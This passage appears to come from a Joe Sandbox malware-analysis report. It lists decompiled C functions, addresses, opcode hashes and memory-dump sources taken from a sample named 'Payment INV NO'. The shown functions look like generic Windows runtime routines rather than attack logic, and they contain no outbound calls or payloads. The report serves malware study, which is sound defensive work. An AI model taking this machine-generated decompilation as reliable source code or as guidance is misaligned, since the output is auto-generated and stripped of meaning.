				 *((intOrPtr*)(_t57 + 0x10)) =  *((intOrPtr*)(_t51 + 0x1c)) + _t55;
				 *((intOrPtr*)(_t57 + 0x14)) =  *((intOrPtr*)(_t51 + 0x24)) + _t55;
				 *((intOrPtr*)(_t57 + 0x18)) =  *((intOrPtr*)(_t51 + 0x28)) + _t55;
				 *((intOrPtr*)(_t57 + 0x1c)) =  *((intOrPtr*)(_t51 + 0x38)) + _t55;
				asm("lock cmpxchg [edx], ecx");
				if(0 != 0) {
					E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
				}
				goto L4;
			}








                                                          0x017d3ef4
                                                          0x017d3f91
                                                          0x00000000
                                                          0x017d3f91
                                                          0x017d3f0c
                                                          0x017d3f10
                                                          0x0180e7d8
                                                          0x00000000
                                                          0x0180e7d8
                                                          0x017d3f2a
                                                          0x0180e7d3
                                                          0x00000000
                                                          0x0180e7d3
                                                          0x017d3f36
                                                          0x017d3f3a
                                                          0x017d3f40
                                                          0x017d3f48
                                                          0x017d3f50
                                                          0x017d3f58
                                                          0x017d3f61
                                                          0x017d3f69
                                                          0x017d3f71
                                                          0x017d3f80
                                                          0x017d3f85
                                                          0x017d3f8b
                                                          0x0180e7eb
                                                          0x0180e7eb
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a9ae16c1b7f7f5e24eb4f9f8fec268914051e9fe0cd3da5f3108355430516e6
                                                          • Instruction ID: 0bec8950628bbc1e043cfbadff67ffc36084ab3ccf1b18da4c0c5dd19ff7bfaf
                                                          • Opcode Fuzzy Hash: 3a9ae16c1b7f7f5e24eb4f9f8fec268914051e9fe0cd3da5f3108355430516e6
                                                          • Instruction Fuzzy Hash: 3C11BB79600A058FC725DF2DC840B56B3F4FF08708B2489ADE959CBB12E730E942CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017D37F5 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E017D37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E017B2280(_t6, 0x1888550);
				}
				_t29 = E017D387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E017AFFB0(0x1888550, _t27, 0x1888550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                          0x017d37fa
                                                          0x017d37fc
                                                          0x017d3805
                                                          0x017d3808
                                                          0x017d3808
                                                          0x017d3814
                                                          0x017d3818
                                                          0x017d3846
                                                          0x017d3848
                                                          0x017d384b
                                                          0x017d384b
                                                          0x017d3852
                                                          0x00000000
                                                          0x017d3854
                                                          0x017d3856
                                                          0x00000000
                                                          0x00000000
                                                          0x017d3863
                                                          0x00000000
                                                          0x017d3863
                                                          0x017d381a
                                                          0x017d381a
                                                          0x017d381f
                                                          0x017d386e
                                                          0x017d386e
                                                          0x017d3871
                                                          0x017d3873
                                                          0x017d3873
                                                          0x017d3868
                                                          0x00000000
                                                          0x017d3868
                                                          0x017d3821
                                                          0x017d3826
                                                          0x00000000
                                                          0x00000000
                                                          0x017d3828
                                                          0x017d382a
                                                          0x017d3841
                                                          0x00000000
                                                          0x017d3841

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8c265d1a02413282a0c16ba001c620073d33abcba687e07c7cc465817fccad60
                                                          • Instruction ID: a08dd666c7161d3b6219f14def4e6e7f0808238bbdf76454f7b5fb958e0c5a88
                                                          • Opcode Fuzzy Hash: 8c265d1a02413282a0c16ba001c620073d33abcba687e07c7cc465817fccad60
                                                          • Instruction Fuzzy Hash: A50126F29816119BC3378B1D9940E2AFBB6FFC1B607154069E945CB205CB30C800C7E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01794CB0 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E01794CB0(void* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, void* _a16) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t26;
				void* _t32;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t41;

				_t35 = __ecx;
				_push(__ecx);
				_push(_t32);
				_t41 = _a4;
				_push(_t38);
				if(_t41 == 0) {
					L8:
					L018688F5(_t32, _t35, _t37, _t38, _t41, __eflags);
					_t21 = 0xc000000d;
					L6:
					return _t21;
				}
				_t22 =  *((intOrPtr*)(_t41 + 0x4c));
				if(_t22 == 0) {
					goto L8;
				}
				_t38 = _a8;
				if( *((intOrPtr*)(_t22 + 0xa8)) != _t38 || ( *(_t41 + 0x84) & 0x00000001) != 0) {
					goto L8;
				} else {
					_t34 = _a16;
					_t23 =  *0x18884c4; // 0x0
					_t36 =  *(_a16 + 2) & 0x0000ffff;
					_v8 =  *(_a16 + 2) & 0x0000ffff;
					_t26 = E017B4620( *(_a16 + 2) & 0x0000ffff,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t23 + 0x80000, _t36);
					 *((intOrPtr*)(_t41 + 0x78)) = _t26;
					if(_t26 == 0) {
						_t21 = 0xc0000017;
					} else {
						E017DF3E0(_t26, _t34, _v8);
						 *((intOrPtr*)(_t41 + 0x7c)) = _t38;
						asm("lock inc dword [eax]");
						 *(_t41 + 0x84) =  *(_t41 + 0x84) | 0x00000001;
						 *(_t41 + 0x80) = _a12 | 0x00040000;
						_t21 = 0;
					}
					goto L6;
				}
			}
















                                                          0x01794cb0
                                                          0x01794cb5
                                                          0x01794cb6
                                                          0x01794cb8
                                                          0x01794cbb
                                                          0x01794cbe
                                                          0x01794d50
                                                          0x01794d50
                                                          0x01794d55
                                                          0x01794d40
                                                          0x01794d46
                                                          0x01794d46
                                                          0x01794cc4
                                                          0x01794cc9
                                                          0x00000000
                                                          0x00000000
                                                          0x01794ccf
                                                          0x01794cd8
                                                          0x00000000
                                                          0x01794ce3
                                                          0x01794ce3
                                                          0x01794ce6
                                                          0x01794cf0
                                                          0x01794cfc
                                                          0x01794d02
                                                          0x01794d07
                                                          0x01794d0c
                                                          0x01794d49
                                                          0x01794d0e
                                                          0x01794d13
                                                          0x01794d18
                                                          0x01794d26
                                                          0x01794d2c
                                                          0x01794d38
                                                          0x01794d3e
                                                          0x01794d3e
                                                          0x00000000
                                                          0x01794d0c

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8cbd89d3680abf9b1b9a3daf3a94982857815cbdd0ebb9ee516b4ebfbba62f8e
                                                          • Instruction ID: 6d23d2521c244a7342ccaec6e0753c5ebf48c0e06771a7ecb387f9e09de86fdf
                                                          • Opcode Fuzzy Hash: 8cbd89d3680abf9b1b9a3daf3a94982857815cbdd0ebb9ee516b4ebfbba62f8e
                                                          • Instruction Fuzzy Hash: 5311A075A00704EFEB22CF59E941B67B7E8EF45318F054469EA9ACB211DB31EC458BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017CFD9B Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E017CFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				signed int _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E017A76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = E017B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                          0x017cfd9b
                                                          0x017cfda0
                                                          0x017cfda1
                                                          0x017cfdab
                                                          0x017cfdad
                                                          0x017cfdb0
                                                          0x017cfdb8
                                                          0x017cfe0f
                                                          0x017cfde6
                                                          0x017cfde9
                                                          0x017cfdec
                                                          0x0180c0c0
                                                          0x017cfdfe
                                                          0x017cfe06
                                                          0x017cfe06
                                                          0x0180c0c8
                                                          0x017cfe2d
                                                          0x017cfe2d
                                                          0x00000000
                                                          0x017cfe2d
                                                          0x0180c0d1
                                                          0x0180c0e0
                                                          0x0180c0e5
                                                          0x0180c0e5
                                                          0x0180c0e8
                                                          0x00000000
                                                          0x0180c0e8
                                                          0x017cfdf4
                                                          0x00000000
                                                          0x00000000
                                                          0x017cfdf6
                                                          0x017cfdfa
                                                          0x017cfe1a
                                                          0x017cfe1f
                                                          0x017cfe1f
                                                          0x017cfdfc
                                                          0x00000000
                                                          0x017cfdfc
                                                          0x017cfdcc
                                                          0x017cfdd0
                                                          0x017cfe26
                                                          0x00000000
                                                          0x017cfe26
                                                          0x017cfdd8
                                                          0x017cfddb
                                                          0x017cfddd
                                                          0x017cfde0
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d62c40a3c761ac8a2f961c0cabe8b24e99e24950a767462a5a84a4593a76cf1b
                                                          • Instruction ID: f3e854091ea24253611725261d793c8b787f9f5882d98c43d77693434b5965e3
                                                          • Opcode Fuzzy Hash: d62c40a3c761ac8a2f961c0cabe8b24e99e24950a767462a5a84a4593a76cf1b
                                                          • Instruction Fuzzy Hash: 0B118872600645DBD735CF4AD480BA6F7E6EB98F10F2141BEE9498B616D730AC40CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01793E80 Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 62%
                                                          			E01793E80(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				void* _t15;
				signed char* _t18;
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t31;
				signed char* _t32;
				signed int _t34;

				_v12 =  *0x188d360 ^ _t34;
				_t14 =  *[fs:0x18];
				_t26 = _a4;
				_t31 =  *((intOrPtr*)(_t14 + 0xf60));
				 *((intOrPtr*)(_t14 + 0xf60)) = _t26;
				_t15 = E017B7D50();
				_t32 = 0x7ffe0390;
				if(_t15 != 0) {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x236;
				} else {
					_t18 = 0x7ffe0390;
				}
				if( *_t18 != 0) {
					if(_t26 == _t31) {
						goto L3;
					}
					_v24 = _t31;
					_v50 = 0x545;
					_v20 = _t26;
					if(E017B7D50() != 0) {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x236;
					}
					_push( &_v56);
					_push(8);
					_push(0x402);
					_push( *_t32 & 0x000000ff);
					E017D9AE0();
					goto L3;
				} else {
					L3:
					return E017DB640(_t31, _t26, _v12 ^ _t34, _t30, _t31, _t32);
				}
			}



















                                                          0x01793e8f
                                                          0x01793e92
                                                          0x01793e99
                                                          0x01793e9e
                                                          0x01793ea4
                                                          0x01793eaa
                                                          0x01793eaf
                                                          0x01793eb6
                                                          0x017f0224
                                                          0x01793ebc
                                                          0x01793ebc
                                                          0x01793ebc
                                                          0x01793ec1
                                                          0x017f0230
                                                          0x00000000
                                                          0x00000000
                                                          0x017f023b
                                                          0x017f023e
                                                          0x017f0242
                                                          0x017f024c
                                                          0x017f0257
                                                          0x017f0257
                                                          0x017f0263
                                                          0x017f0264
                                                          0x017f0266
                                                          0x017f026b
                                                          0x017f026c
                                                          0x00000000
                                                          0x01793ec7
                                                          0x01793ec7
                                                          0x01793ed9
                                                          0x01793ed9

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
